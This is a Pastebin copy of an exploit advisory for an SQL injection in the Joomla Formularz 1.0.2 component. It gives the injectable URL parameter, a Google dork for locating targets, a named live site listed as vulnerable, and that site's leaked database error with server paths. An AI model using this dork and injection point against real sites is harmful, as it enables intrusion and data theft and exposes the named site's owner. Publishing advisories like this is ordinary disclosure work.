Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : Joomla Formularz Components 1.0.2 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 31/01/2019
- # Vendor Homepage : joomla.pl
- # Software Download Link : joomla.pl/zasoby/na-twoja-witryne/formularz-w-5-minut
- # Software Version : 1.0.2
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_formularz''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010304
- packetstormsecurity.com/files/151424/Joomla-Formularz-1.0.2-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- " Formularz " is open source software for Joomla.
- ####################################################################
- # Impact :
- ***********
- Joomla Formularz 1.0.2 component for Joomla! is prone to an SQL-injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_formularz&formularz=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] spb-pba.org.pl/index.php?option=com_formularz&formularz=1%27
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Fatal error: Uncaught exception 'RuntimeException' with message 'Unknown column
- 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM
- `sev_redirect_links` WHERE `old_url` = 'http://www.spb-pba.org.pl
- /index.php?option=com_formularz&formularz=1\'' LIMIT 0, 1' in
- /var/www/html/users/s/p/spbwww/www.spb-pba.org.pl/libraries/joomla/database
- /driver/mysqli.php:610 Stack trace: #0 /var/www/html/users/s/p/spbwww
- /www.spb-pba.org.pl/libraries/joomla/database/driver.php(1279):
- JDatabaseDriverMysqli->execute() #1 /var/www/html/users/s/p/spbwww
- /www.spb-pba.org.pl/plugins/system/redirect/redirect.php(86): JDatabaseDriver->
- loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(Exception))
- #3 {main} thrown in /var/www/html/users/s/p/spbwww
- /www.spb-pba.org.pl/libraries/joomla/
- database/driver/mysqli.php on line 610
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment